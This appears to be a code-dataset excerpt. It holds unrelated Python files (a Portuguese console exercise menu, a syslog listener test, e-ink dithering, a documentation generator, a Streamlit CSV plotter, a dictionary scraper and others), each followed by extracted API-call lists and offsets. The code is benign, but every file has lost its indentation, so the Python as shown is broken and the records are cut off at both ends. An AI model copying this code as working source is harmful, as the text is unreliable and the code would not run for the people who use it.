print(" 0 - PARA SAIR")
print("")
opcao = int(input("Digite o desejado: "))
clear()
if(opcao == 1):
print("PESSOA MAIS VELHA")
print("Digite o nome da primeira pessoa: ")
p1 = input("Nome: ")
i1 = int(input("Idade: "))
print("Digite o nome da Segunda pessoa: ")
p2 = input("Nome: ")
i2 = int(input("Idade: "))
if(i1 > i2):
print("pessoa mais velha: {}".format(p1))
else:
print("pessoa mais velha: {}".format(p2))
print("")
elif(opcao == 2):
print("MEDIA DE SALÁRIO")
print("Digite o nome do primeiro funcionairo: ")
p1 = input("Nome: ")
s1 = float(input("Salário: "))
print("Digite o nome do Segundo funcionairo: ")
p2 = input("Nome: ")
s2 = float(input("Salário: "))
media =(s1 + s2 ) / 2
print("Salário médio = {}".format(media))
print("")
elif(opcao == 3):
from retangulo import Retangulo
print("LARGURA E ALTURA DE UM RETÂNGULO")
print("Entre com a largura e altura do retângulo: ")
L1 = float(input("Largura: "))
A1 = float(input("Altura: "))
retangulo = Retangulo(A1,L1)
area = retangulo.Area(A1,L1)
perimetro = retangulo.Perimetro(A1, L1)
diagonal = retangulo.Diagonal(A1, L1)
print("Area: {}".format(area))
print("Perímetro: {}".format(perimetro))
print("Diagonal: {}".format(diagonal))
print("")
elif(opcao == 4):
from funcionario import Funcionario
print("ATUALIZAÇÃO DE DADOS")
print("Digite um funcionario")
nome = input("Nome: ")
salario = float(input("Salario: "))
imposto = float(input("Imposto: "))
funcionario1 = Funcionario(nome, salario, imposto)
liquido = funcionario1.SalarioLiquido(salario, imposto)
print(" ")
print("Funcionairo : {} , R$ {}".format(nome, liquido))
comis = float(input("Digite a porcentagem para aumentar o salário: "))
aument = funcionario1.AumentoSalario(salario, liquido, comis)
print("Dados Atualizados : {} R$ {}".format(nome, aument))
print("")
elif(opcao == 5):
print("APROVADO OU REPROVADO")
nome = input("Nome do Aluno: ")
nota1 = float(input("Primeira nota : "))
nota2 = float(input("Segunda nota : "))
nota3 = float(input("Terceira nota : "))
notas = (nota1 + nota2 + nota3)
print("")
vb = 60.0
vr = vb - notas
if(notas >= vb):
print("Nota final = {:.2f}".format(notas))
print("Aprovado")
else:
print("Nota final = {:.2f}".format(notas))
print("Reprovado")
print("Faltaram {:.2f} pontos".format(vr))
print("")
elif(opcao == 0):
break
else:
print("Valor informado inválido! ") | [
"funcionario.Funcionario",
"os.system",
"retangulo.Retangulo"
] | [((27, 45), 'os.system', 'os.system', (['"""clear"""'], {}), "('clear')\n", (36, 45), False, 'import os\n'), ((1566, 1583), 'retangulo.Retangulo', 'Retangulo', (['A1', 'L1'], {}), '(A1, L1)\n', (1575, 1583), False, 'from retangulo import Retangulo\n'), ((2177, 2212), 'funcionario.Funcionario', 'Funcionario', (['nome', 'salario', 'imposto'], {}), '(nome, salario, imposto)\n', (2188, 2212), False, 'from funcionario import Funcionario\n')] |
# -*- coding: utf-8 -*-
import time
import logging
from logging.handlers import SysLogHandler
from hamcrest import *
from amplify.agent.pipelines.syslog import SyslogTail, SYSLOG_ADDRESSES, AmplifyAddresssAlreadyInUse
from test.base import BaseTestCase, disabled_test
__author__ = "<NAME>"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__license__ = ""
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
class SyslogTailTestCase(BaseTestCase):
def setup_method(self, method):
super(SyslogTailTestCase, self).setup_method(method)
self.tail = SyslogTail(address=('localhost', 514), interval=0.1)
# Set up python logger
self.logger = logging.getLogger(self.__class__.__name__)
self.logger.setLevel(logging.DEBUG)
self.handler = SysLogHandler(address=('localhost', 514))
self.handler.setFormatter(logging.Formatter(' amplify: %(message)s'))
self.logger.addHandler(self.handler)
def teardown_method(self, method):
# Revert logger stuff
self.handler.close()
self.handler = None
self.logger = None
# Kill the SyslogTail
self.tail.stop()
self.tail = None
def test_overall(self):
time.sleep(0.1) # Release GIL so async listener can "hear" the DGRAMs
count = 1
while count <= 5:
self.logger.debug('This is message #%s' % count)
count += 1
time.sleep(0.1) # Release GIL so async listener can handle DGRAMs
# Check to see that SyslogListener read 5 messages
assert_that(self.tail.cache, has_length(count-1))
# Check the cache directly to make sure messages were decoded.
for i in range(5):
assert_that(self.tail.cache[i], equal_to(u'This is message #%s\x00' % (i+1)))
# Go through and check the messages via iteration
count = 1
for line in self.tail:
assert_that(line, equal_to(u'This is message #%s\x00' % count))
count += 1
# Check that cache was cleared after iteration
assert_that(self.tail.cache, has_length(0))
# TODO: test_overall doesn't work if there are other tests run with it...why?
# The tests below pass, but will cause test_overall to fail if run...so skipped for now.
@disabled_test
def test_addresses(self):
assert_that(('localhost', 514), is_in(SYSLOG_ADDRESSES))
@disabled_test
def test_socket_conflict(self):
assert_that(
calling(SyslogTail).with_args(address=('localhost', 514)),
raises(AmplifyAddresssAlreadyInUse)
)
| [
"time.sleep",
"logging.Formatter",
"amplify.agent.pipelines.syslog.SyslogTail",
"logging.handlers.SysLogHandler",
"logging.getLogger"
] | [((583, 635), 'amplify.agent.pipelines.syslog.SyslogTail', 'SyslogTail', ([], {'address': "('localhost', 514)", 'interval': '(0.1)'}), "(address=('localhost', 514), interval=0.1)\n", (593, 635), False, 'from amplify.agent.pipelines.syslog import SyslogTail, SYSLOG_ADDRESSES, AmplifyAddresssAlreadyInUse\n'), ((690, 732), 'logging.getLogger', 'logging.getLogger', (['self.__class__.__name__'], {}), '(self.__class__.__name__)\n', (707, 732), False, 'import logging\n'), ((800, 841), 'logging.handlers.SysLogHandler', 'SysLogHandler', ([], {'address': "('localhost', 514)"}), "(address=('localhost', 514))\n", (813, 841), False, 'from logging.handlers import SysLogHandler\n'), ((1237, 1252), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (1247, 1252), False, 'import time\n'), ((1445, 1460), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (1455, 1460), False, 'import time\n'), ((876, 918), 'logging.Formatter', 'logging.Formatter', (['""" amplify: %(message)s"""'], {}), "(' amplify: %(message)s')\n", (893, 918), False, 'import logging\n')] |
import datetime
from enum import Enum
import hitherdither
from PIL import Image
from inky.inky_uc8159 import Inky
WIDTH, HEIGHT = 600, 448
SATURATION = 1.0
start_log = datetime.datetime.now()
last_log = start_log
def log(msg: str) -> None:
global last_log
now = datetime.datetime.now()
diff = (now - last_log).total_seconds()
from_start = (now - start_log).total_seconds()
last_log = now
print(f"[{from_start:5.2f} +{diff:.2f} ]\t{msg}")
class DitheringModes(Enum):
DEFAULT = "default"
SMALL_DOTS = "small_dots"
LARGE_DOTS = "large_dots"
def dithered(
inky: Inky, image: Image, mode: DitheringModes = DitheringModes.DEFAULT
) -> Image:
log("Dithering")
palette = hitherdither.palette.Palette(
inky._palette_blend(SATURATION, dtype="uint24")
)
thresholds = [64, 64, 64] # Threshold for snapping colours, I guess?
if mode == DitheringModes.SMALL_DOTS:
image_dithered = hitherdither.ordered.cluster.cluster_dot_dithering(
image, palette, thresholds, order=4
)
elif mode == DitheringModes.LARGE_DOTS:
image_dithered = hitherdither.ordered.cluster.cluster_dot_dithering(
image, palette, thresholds, order=8
)
else:
image_dithered = hitherdither.ordered.bayer.bayer_dithering(
image, palette, thresholds, order=8
)
log("Done dithering")
return image_dithered
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
| [
"hitherdither.ordered.bayer.bayer_dithering",
"datetime.datetime.now",
"hitherdither.ordered.cluster.cluster_dot_dithering"
] | [((171, 194), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (192, 194), False, 'import datetime\n'), ((275, 298), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (296, 298), False, 'import datetime\n'), ((953, 1044), 'hitherdither.ordered.cluster.cluster_dot_dithering', 'hitherdither.ordered.cluster.cluster_dot_dithering', (['image', 'palette', 'thresholds'], {'order': '(4)'}), '(image, palette,\n thresholds, order=4)\n', (1003, 1044), False, 'import hitherdither\n'), ((1132, 1223), 'hitherdither.ordered.cluster.cluster_dot_dithering', 'hitherdither.ordered.cluster.cluster_dot_dithering', (['image', 'palette', 'thresholds'], {'order': '(8)'}), '(image, palette,\n thresholds, order=8)\n', (1182, 1223), False, 'import hitherdither\n'), ((1277, 1356), 'hitherdither.ordered.bayer.bayer_dithering', 'hitherdither.ordered.bayer.bayer_dithering', (['image', 'palette', 'thresholds'], {'order': '(8)'}), '(image, palette, thresholds, order=8)\n', (1319, 1356), False, 'import hitherdither\n')] |
#!/usr/bin/env python2.7
import json
from pprint import pprint
import os
import sys
import re
import dokumentor
import subprocess
def parseParam(arg, indent=0, isReturn=False):
out = ""
if isReturn:
out += "Returns (%s): %s\n" % (parseParamsType(arg["typed"]), arg["description"])
else:
out += "%s* `%s` (%s): %s\n" % (' ' * indent, arg["name"], parseParamsType(arg["typed"]), arg["description"])
if "params" in arg:
# Callback function
for subArg in arg["params"]:
out += parseParam(subArg, indent + 4)
elif type(arg["typed"][0]) is dict:
# Object
for subArg in arg["typed"][0]["details"]:
out += parseParam(subArg, 0 if isReturn else indent + 4)
elif type(arg["typed"][0]) is list:
# Array of Object
for subArg in arg["typed"][0][0]["details"]:
out += parseParam(subArg, 0 if isReturn else indent + 4)
return out
def parseParamsType(types):
out = ""
comma = ""
for t in types:
out += comma
if type(t) is list:
out += "Object[]"
elif type(t) is dict:
out += "Object"
else:
if t[0] == "[":
out += t[1:-1].capitalize() + "[]"
else:
if t == "null":
out += t
else:
out += t if t[0].isupper() else t.capitalize()
comma = " | "
return out
def parseMethod(method, isEvent=False):
out = ""
if isEvent:
out += "\n## Event: %s\n" % (re.sub("[A-Za-z_0-9]+\.", "", method["name"]))
else:
fnArgs = ""
if len(method["params"]) > 0:
comma = ""
for arg in method["params"]:
name = comma + arg["name"]
if arg["default"] != "None":
name += "=%s" % arg["default"]
if arg["is_optional"]:
name = "[%s]" % name
fnArgs += name
comma = ", "
out += "\n## %s%s%s(%s)\n" % ("`static `" if method["is_static"] else "",
"new " if method["is_constructor"] else "",
method["name"],
fnArgs)
if method["is_slow"]:
out += "<!-- YAML\n- Slow method\n-->\n"
out += method["description"] + "\n"
if len(method["params"]) > 0:
out += "\nParams:\n"
for arg in method["params"]:
out += parseParam(arg)
if method["returns"] and not method["is_constructor"]:
if method["returns"]["nullable"]:
method["returns"]["typed"].append("null")
tmp = parseParam(method["returns"], isReturn=True)
if tmp:
out += "\n" + tmp
out += parseSeeAlso(method["sees"])
return out
def parseProperty(prop):
out = ""
out += "\n## %s%s%s%s (%s)\n" % ("`static` " if prop["is_static"] else "",
"`readonly` " if prop["is_readonly"] else "",
prop["name"],
"=" + prop["default"] if prop["default"] != "None" else "",
parseParamsType(prop["typed"]))
out += prop["description"] + "\n"
out += parseExample(prop["examples"])
out += parseSeeAlso(prop["sees"])
return out
def parseSeeAlso(seeAlso):
return ""
"""
out = ""
if len(seeAlso) > 0:
out += "\nSee also:\n"
for see in seeAlso:
out += "* `%s`\n" % (see["data"])
return out
"""
def parseExample(examples):
out = ""
if len(examples) > 0:
out += "\n"
for ex in examples:
out += "\n```%s\n%s\n```\n" % (ex["language"], ex["data"])
return out
def parse(klass, data):
out = ""
out += "# Class: %s" % (klass) + "\n"
item = data["base"][klass]
out += item["description"]
out += parseExample(item["examples"])
out += parseSeeAlso(item["sees"])
if data["constructors"]:
out += parseMethod(data["constructors"][klass])
if data["methods"]:
for name, method in data["methods"].iteritems():
out += parseMethod(method)
if data["static_methods"]:
for name, method in data["static_methods"].iteritems():
out += parseMethod(method)
if data["properties"]:
for name, prop in data["properties"].iteritems():
out += parseProperty(prop)
if data["events"]:
for evName, ev in data["events"].iteritems():
out += parseMethod(ev, isEvent=True)
return out
print("Running dokumentor")
class captureDokumentor:
def __init__(self):
self.data = ""
def write(self, msg):
self.data += msg
def flush(self=None):
pass
sys.stdout = captureDokumentor()
dokumentor.process("../docs/")
docs = sys.modules['DOCC'].DOC
dokumentor.report("json", docs)
data = json.loads(sys.stdout.data)
sys.stdout = sys.__stdout__
hierarchy = {}
for section, items in data["_sections"].iteritems():
if section not in data:
data[section] = {"base": { section: {"description": "", "sees":[], "examples": {}}}, "constructors": {}, "methods": [], "properties": [], "events":[], "static_methods": []}
hierarchy[section] = {"data": parse(section, data[section])}
hierarchy[section]["children"] = {}
for klass in items:
hierarchy[section]["children"][klass] = parse(klass, data[klass])
path = "../docs/en/api/"
try:
os.mkdir(path)
except:
pass
for directory in hierarchy:
if len(hierarchy[directory]["children"]) > 1:
subPath = path + directory + "/"
try:
os.mkdir(subPath)
except:
pass
print("Writing %s" % subPath + directory + ".md")
with open(subPath + directory + ".md", "w") as f:
f.write(hierarchy[directory]["data"])
for child in hierarchy[directory]["children"]:
print(" - Writing %s" % subPath + child + ".md")
with open(subPath + child + ".md", "w") as f:
f.write(hierarchy[directory]["children"][child])
else:
print("Writing %s" % path + directory + ".md")
with open(path + directory + ".md", "w") as f:
f.write(hierarchy[directory]["data"])
| [
"os.mkdir",
"json.loads",
"dokumentor.process",
"dokumentor.report",
"re.sub"
] | [((4870, 4900), 'dokumentor.process', 'dokumentor.process', (['"""../docs/"""'], {}), "('../docs/')\n", (4888, 4900), False, 'import dokumentor\n'), ((4932, 4963), 'dokumentor.report', 'dokumentor.report', (['"""json"""', 'docs'], {}), "('json', docs)\n", (4949, 4963), False, 'import dokumentor\n'), ((4971, 4998), 'json.loads', 'json.loads', (['sys.stdout.data'], {}), '(sys.stdout.data)\n', (4981, 4998), False, 'import json\n'), ((5543, 5557), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (5551, 5557), False, 'import os\n'), ((1568, 1614), 're.sub', 're.sub', (['"""[A-Za-z_0-9]+\\\\."""', '""""""', "method['name']"], {}), "('[A-Za-z_0-9]+\\\\.', '', method['name'])\n", (1574, 1614), False, 'import re\n'), ((5720, 5737), 'os.mkdir', 'os.mkdir', (['subPath'], {}), '(subPath)\n', (5728, 5737), False, 'import os\n')] |
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import plotly.express as px
import plotly.graph_objects as go
import streamlit as st
import io
import base64
from util import process_file
def limit_x_values(data, x_column, settings):
st.markdown("### Limit x Range")
x_min = st.number_input("Choose minimum x:", value=min([min(df[x_column].values) for df in data]))
x_max = st.number_input("Choose maximum x:", value=max([max(df[x_column].values) for df in data]))
settings['x_min'] = x_min
settings['x_max'] = x_max
data_out = []
for df in data:
mask = (df[x_column].values > x_min) * (df[x_column].values < x_max)
data_out.append(df[mask])
return data_out, settings
scales = {'A': 1, 'mA': 1e3, 'µA': 1e6}
def scale_current(data, y_column, settings):
st.markdown("### Scale Current")
scale = st.selectbox("Scale:", list(scales.keys()), index=1)
settings['y_scale'] = scale
data_out = []
for df in data:
df2 = df.copy()
df2[y_column] = df2[y_column] * scales[scale]
data_out.append(df2)
return data_out, settings
# def process_data(data, y_column, settings):
# st.markdown("### Rescale y-axis")
# st.selectbox("Choose y-axis scale:", value=[0, 3, 6, 9], format_func=
def run():
df = None
cols = None
x_column = y_column = None
combined_data = None
processing="None"
if 'ever_submitted' not in st.session_state:
st.session_state.ever_submitted = False
settings = {"processing": "None"}
st.markdown("""## Combine CSV Electrochemistry files
This helper will combine multiple CSV files (or Excel spreadsheets)
for easy plotting.
""")
files = st.file_uploader("Upload CSV or Excel Files",
accept_multiple_files=True)
if files:
st.write(files)
filenames = [(i, f.name) for i, f in enumerate(files)]
data = [process_file(f) for f in files]
ind_fname = st.selectbox("Choose data to display: ", filenames,
format_func=lambda x: x[1], index=0)
st.write("""## Labels
Use the boxes below to change the labels for each line that will go on the graph.
""")
labels = [st.text_input(f"{filename[0]}. {filename[1]}", value=filename[1]) for filename in filenames]
if ind_fname:
df = data[ind_fname[0]]
cols = list(df.columns)
st.write("## Choose columns")
with st.form("column_chooser_and_run"):
x_column = st.selectbox("Choose the x column: ", cols)
y_column = st.selectbox("Choose y column: ", cols, index=len(cols)-1)
submitted = st.form_submit_button()
st.session_state.ever_submitted = submitted | st.session_state.ever_submitted
use_plotly = st.checkbox("Use plotly?", value=False)
if data is not None:
data, settings = limit_x_values(data, x_column, settings)
data, settings = scale_current(data, y_column, settings)
# data, settings = normalize_data(data, x_column, settings)
# x_data = combined_data[x_column].values
# Plotting
if use_plotly:
fig = go.Figure()
else:
fig, ax = plt.subplots()
for df, fname, label in zip(data, filenames, labels):
if use_plotly:
fig.add_trace(go.Line(x=df[x_column], y=df[y_column], name=str(fname[0])+"-"+label))
else:
ax.plot(df[x_column].values, df[y_column].values, label=str(fname[0])+"-"+label)
y_label_default = f"{y_column} ({settings['y_scale']})"
st.markdown("### Plotting options")
x_label = st.text_input("x-axis label: ", value=x_column)
y_label = st.text_input('y-axis label: ', value=y_label_default)
grid = st.checkbox("Grid?", value=False)
if grid and not use_plotly:
ax.grid()
if use_plotly:
fig.update_layout(xaxis_title=x_label, yaxis_title=y_label)
st.plotly_chart(fig)
else:
ax.set_xlabel(x_label)
ax.set_ylabel(y_label)
ax.legend()
st.pyplot(fig)
# # Saving
# st.markdown("### Output options")
# st.write(combined_data)
# filename = st.text_input("Filename:", value="data")
# write_excel(combined_data, filename)
if __name__ == "__main__":
run()
| [
"streamlit.form",
"streamlit.markdown",
"streamlit.text_input",
"streamlit.plotly_chart",
"streamlit.checkbox",
"plotly.graph_objects.Figure",
"streamlit.write",
"streamlit.file_uploader",
"util.process_file",
"streamlit.form_submit_button",
"streamlit.pyplot",
"streamlit.selectbox",
"matplotlib.pyplot.subplots"
] | [((263, 295), 'streamlit.markdown', 'st.markdown', (['"""### Limit x Range"""'], {}), "('### Limit x Range')\n", (274, 295), True, 'import streamlit as st\n'), ((832, 864), 'streamlit.markdown', 'st.markdown', (['"""### Scale Current"""'], {}), "('### Scale Current')\n", (843, 864), True, 'import streamlit as st\n'), ((1561, 1721), 'streamlit.markdown', 'st.markdown', (['"""## Combine CSV Electrochemistry files\n\nThis helper will combine multiple CSV files (or Excel spreadsheets)\nfor easy plotting.\n\n """'], {}), '(\n """## Combine CSV Electrochemistry files\n\nThis helper will combine multiple CSV files (or Excel spreadsheets)\nfor easy plotting.\n\n """\n )\n', (1572, 1721), True, 'import streamlit as st\n'), ((1725, 1798), 'streamlit.file_uploader', 'st.file_uploader', (['"""Upload CSV or Excel Files"""'], {'accept_multiple_files': '(True)'}), "('Upload CSV or Excel Files', accept_multiple_files=True)\n", (1741, 1798), True, 'import streamlit as st\n'), ((1839, 1854), 'streamlit.write', 'st.write', (['files'], {}), '(files)\n', (1847, 1854), True, 'import streamlit as st\n'), ((1988, 2081), 'streamlit.selectbox', 'st.selectbox', (['"""Choose data to display: """', 'filenames'], {'format_func': '(lambda x: x[1])', 'index': '(0)'}), "('Choose data to display: ', filenames, format_func=lambda x: x\n [1], index=0)\n", (2000, 2081), True, 'import streamlit as st\n'), ((2098, 2224), 'streamlit.write', 'st.write', (['"""## Labels\nUse the boxes below to change the labels for each line that will go on the graph.\n """'], {}), '(\n """## Labels\nUse the boxes below to change the labels for each line that will go on the graph.\n """\n )\n', (2106, 2224), True, 'import streamlit as st\n'), ((2443, 2472), 'streamlit.write', 'st.write', (['"""## Choose columns"""'], {}), "('## Choose columns')\n", (2451, 2472), True, 'import streamlit as st\n'), ((2837, 2876), 'streamlit.checkbox', 'st.checkbox', (['"""Use plotly?"""'], {'value': '(False)'}), "('Use plotly?', value=False)\n", (2848, 2876), True, 'import streamlit as st\n'), ((1935, 1950), 'util.process_file', 'process_file', (['f'], {}), '(f)\n', (1947, 1950), False, 'from util import process_file\n'), ((2233, 2298), 'streamlit.text_input', 'st.text_input', (['f"""{filename[0]}. {filename[1]}"""'], {'value': 'filename[1]'}), "(f'{filename[0]}. {filename[1]}', value=filename[1])\n", (2246, 2298), True, 'import streamlit as st\n'), ((2486, 2519), 'streamlit.form', 'st.form', (['"""column_chooser_and_run"""'], {}), "('column_chooser_and_run')\n", (2493, 2519), True, 'import streamlit as st\n'), ((2544, 2587), 'streamlit.selectbox', 'st.selectbox', (['"""Choose the x column: """', 'cols'], {}), "('Choose the x column: ', cols)\n", (2556, 2587), True, 'import streamlit as st\n'), ((2695, 2718), 'streamlit.form_submit_button', 'st.form_submit_button', ([], {}), '()\n', (2716, 2718), True, 'import streamlit as st\n'), ((3738, 3773), 'streamlit.markdown', 'st.markdown', (['"""### Plotting options"""'], {}), "('### Plotting options')\n", (3749, 3773), True, 'import streamlit as st\n'), ((3800, 3847), 'streamlit.text_input', 'st.text_input', (['"""x-axis label: """'], {'value': 'x_column'}), "('x-axis label: ', value=x_column)\n", (3813, 3847), True, 'import streamlit as st\n'), ((3870, 3924), 'streamlit.text_input', 'st.text_input', (['"""y-axis label: """'], {'value': 'y_label_default'}), "('y-axis label: ', value=y_label_default)\n", (3883, 3924), True, 'import streamlit as st\n'), ((3944, 3977), 'streamlit.checkbox', 'st.checkbox', (['"""Grid?"""'], {'value': '(False)'}), "('Grid?', value=False)\n", (3955, 3977), True, 'import streamlit as st\n'), ((3246, 3257), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (3255, 3257), True, 'import plotly.graph_objects as go\n'), ((3302, 3316), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3314, 3316), True, 'import matplotlib.pyplot as plt\n'), ((4165, 4185), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig'], {}), '(fig)\n', (4180, 4185), True, 'import streamlit as st\n'), ((4326, 4340), 'streamlit.pyplot', 'st.pyplot', (['fig'], {}), '(fig)\n', (4335, 4340), True, 'import streamlit as st\n')] |
#!/usr/bin/env python3
from sys import stderr, exit
import sys
import graph_connectivity_lib as gcl
def startAlgo():
numNodes = None
spoon = input().strip()
# Getting graph
while spoon[:len("graph:")] != "graph:":
# Getting number of nodes
if spoon[:len("# number of nodes:")] == "# number of nodes:":
numNodes = spoon.split(':')[1]
numNodes = int("".join(numNodes.split()))
# Getting number archs
if spoon[:len("# number of arcs: ")] == "# number of arcs: ":
m = spoon.split(':')[1]
m = int("".join(m.split()))
spoon = input().strip()
# Creating graph
grafo = gcl.Graph(numNodes)
# Getting arcs
for _ in range(m):
spoon = input().strip()
v, u = spoon.split(' ')
v, u = int(v), int(u)
grafo.add_edge(v, u)
# Ricevo istruzioni dal servizio
while spoon[:len("# Tell me")] != "# Tell me":
spoon = input().strip()
# Checking spanning tree
input_spTree, not_visited = grafo.spanning_tree()
# Telling sp tree length
print(len(input_spTree))
#printing sp tree
for i in range(len(input_spTree)):
u, v = input_spTree[i]
print(f"{u} {v}")
# Getting response
spoon = input().strip()
while spoon != "#end".strip():
print(spoon)
sys.stderr.write(str(spoon)+ "\n")
spoon = input().strip()
# Main
spoon = input().strip()
while spoon[:len("#start")] != "#start":
spoon = input().strip()
# Reading the graph
startAlgo() | [
"graph_connectivity_lib.Graph"
] | [((684, 703), 'graph_connectivity_lib.Graph', 'gcl.Graph', (['numNodes'], {}), '(numNodes)\n', (693, 703), True, 'import graph_connectivity_lib as gcl\n')] |
#import Pillow
#from colors.py import generate_colors
import colorthief
from colorthief import ColorThief
import glob
from pathlib import Path
def get_colors(image):
dominant_color = ColorThief(image).get_palette(color_count=3, quality=3)
return dominant_color
#print (get_colors('blockchains/polygon/info/logo.png'))
def get_files():
files = list(Path('blockchains').glob('**/*.png'))
return files
#print (get_files())
def main():
colors_list = []
for i in get_files():
color = get_colors(i)
name = str(i).split('/')[-2]
if name == 'info':
name = str(i).split('/')[-3]
tmp = {name: color}
print(tmp)
colors_list.append(tmp)
print(colors_list)
main()
| [
"pathlib.Path",
"colorthief.ColorThief"
] | [((186, 203), 'colorthief.ColorThief', 'ColorThief', (['image'], {}), '(image)\n', (196, 203), False, 'from colorthief import ColorThief\n'), ((355, 374), 'pathlib.Path', 'Path', (['"""blockchains"""'], {}), "('blockchains')\n", (359, 374), False, 'from pathlib import Path\n')] |
import pandas as pd
from crawler import MyDict
class MyEnglishDict(MyDict):
def __init__(self, url):
super(MyEnglishDict, self).__init__(url)
def lookup(self, word):
output = {}
raw_text = self.get_web_result(self.url, word)
phonetic_symbols = raw_text.find(name='ul', class_='Mean_symbols__5dQX7')
if phonetic_symbols is None:
return None
phonetic_symbols = phonetic_symbols.find_all('li')
if len(phonetic_symbols) < 2:
return None
phonetic_symbols_text = [x for x in phonetic_symbols[1].strings]
output['phonetic_symbol'] = phonetic_symbols_text[1]
print(output['phonetic_symbol'])
meanings = raw_text.find(name='ul', class_='Mean_part__1RA2V').find_all('li')
if meanings is None:
return None
definitions = []
for m in meanings:
lexical_category = m.find('i').string
raw_definitions = m.find_all('span')
sub_definitions = [lexical_category]
for d in raw_definitions:
sub_definitions.append(d.text)
definitions.append(' '.join(sub_definitions))
output['definitions'] = '\n'.join(definitions)
print(output['definitions'])
return output
if __name__ == '__main__':
df = pd.DataFrame(columns=["Word", "Audio", "Meaning", "Example", "Source"])
dictionary = MyEnglishDict("http://www.iciba.com/word?w=")
while True:
print("//--------------------------------------")
unknown_word = input("请输入查询的单词/输入‘886’离开:")
if unknown_word == '886':
empty = input("将要替代上次记录的结果,按回车继续...")
df.to_csv('./save_recode_english.csv', index=False, header=False, encoding='utf-8_sig')
break
result = dictionary.lookup(unknown_word)
if result is None:
print("找不到单词TAT")
continue
sentence = input("输入例句/输入'N'不保存:")
if sentence != 'N':
source = input("输入例句来源(可选):")
df = df.append([{'Word': unknown_word, "Audio": result['phonetic_symbol'], "Meaning": result['definitions'], "Example": sentence, "Source": source}], ignore_index=True)
| [
"pandas.DataFrame"
] | [((1370, 1441), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['Word', 'Audio', 'Meaning', 'Example', 'Source']"}), "(columns=['Word', 'Audio', 'Meaning', 'Example', 'Source'])\n", (1382, 1441), True, 'import pandas as pd\n')] |
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid.axislines import SubplotZero
import numpy as np
import cyllene.f_functionclass as f_funct
import sympy as sp
'''
A lot of problems need to be resolved:
1)Can we keep a record of the graphs graphed? this can be done by just keeping the numpy arrays ?
2)we need to be able to deal with poles of functions ( for example 1/x at x = 0, 1/(x^2-1) at x = -1, 1 ...etc)
'''
class graph():
def __init__(self):
self.fig = plt.figure(1)
self.ax = SubplotZero(self.fig,111)
self.fig.add_subplot(self.ax)
for direction in ["xzero","yzero"]:
self.ax.axis[direction].set_axisline_style("-|>")
self.ax.axis[direction].set_visible(True)
for direction in ["left","right","bottom","top"]:
self.ax.axis[direction].set_visible(False)
def make_graph(self, f):
I = f.behaviour("largest interval")
ps = float(I.args[0])
pe = float(I.args[1])
t = np.arange(ps, pe, 0.01)
self.ax.plot(t, f.eval_np(t))
def make_graphs(self, *functions,Interval=None):
if(Interval == None):
f = functions[0]
I = f.behaviour("largest interval")
l,r = float(I.args[0]), float(I.args[1])
for f in functions:
I = f.behaviour("largest interval")
l,r = min(l,float(I.args[0])), max(r,float(I.args[1]))
else:
l,r = float(Interval.args[0]), float(Interval.args[1])
self.Interval = sp.Interval(l,r)
t = np.arange(l,r,.01)
for f in functions:
self.ax.plot(t,f.eval_np(t))
def make_secent(self,f,x1,x2):
I = f.behaviour("largest interval")
ps = float(I.args[0])
pe = float(I.args[1])
t = np.arange(ps, pe, 0.01)
sec = f.secent_line(x1,x2)
self.ax.plot(t, sec.eval_np(t))
self.plot_point(x1, sec.eval_np(x1))
self.plot_point(x2,sec.eval_np(x2))
def make_tangent(self,f,x):
I = f.behaviour("largest interval")
ps = float(I.args[0])
pe = float(I.args[1])
t = np.arange(ps, pe, 0.01)
tan = f.tangent_line(x)
self.ax.plot(t, tan.eval_np(t))
self.plot_point(x, tan.eval_np(x))
def plot_point(self, x, y):
self.ax.plot(np.array([x]), np.array([y]), 'ro')
def zoom_y(self, f, I):
self.zoom_x(I)
self.zoom_y(f.range(I))
def zoom_x(self,I):
ps = float(I.args[0])
pe = float(I.args[1])
self.ax.set_xlim(ps,pe)
def zoom_y(self,I):
ps = float(I.args[0])
pe = float(I.args[1])
self.ax.set_ylim(ps,pe)
def show(self):
return self.fig | [
"mpl_toolkits.axes_grid.axislines.SubplotZero",
"sympy.Interval",
"matplotlib.pyplot.figure",
"numpy.array",
"numpy.arange"
] | [((486, 499), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {}), '(1)\n', (496, 499), True, 'import matplotlib.pyplot as plt\n'), ((512, 538), 'mpl_toolkits.axes_grid.axislines.SubplotZero', 'SubplotZero', (['self.fig', '(111)'], {}), '(self.fig, 111)\n', (523, 538), False, 'from mpl_toolkits.axes_grid.axislines import SubplotZero\n'), ((930, 953), 'numpy.arange', 'np.arange', (['ps', 'pe', '(0.01)'], {}), '(ps, pe, 0.01)\n', (939, 953), True, 'import numpy as np\n'), ((1375, 1392), 'sympy.Interval', 'sp.Interval', (['l', 'r'], {}), '(l, r)\n', (1386, 1392), True, 'import sympy as sp\n'), ((1405, 1426), 'numpy.arange', 'np.arange', (['l', 'r', '(0.01)'], {}), '(l, r, 0.01)\n', (1414, 1426), True, 'import numpy as np\n'), ((1607, 1630), 'numpy.arange', 'np.arange', (['ps', 'pe', '(0.01)'], {}), '(ps, pe, 0.01)\n', (1616, 1630), True, 'import numpy as np\n'), ((1896, 1919), 'numpy.arange', 'np.arange', (['ps', 'pe', '(0.01)'], {}), '(ps, pe, 0.01)\n', (1905, 1919), True, 'import numpy as np\n'), ((2065, 2078), 'numpy.array', 'np.array', (['[x]'], {}), '([x])\n', (2073, 2078), True, 'import numpy as np\n'), ((2080, 2093), 'numpy.array', 'np.array', (['[y]'], {}), '([y])\n', (2088, 2093), True, 'import numpy as np\n')] |
import sc_utils
import model_factory
import numpy as np
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
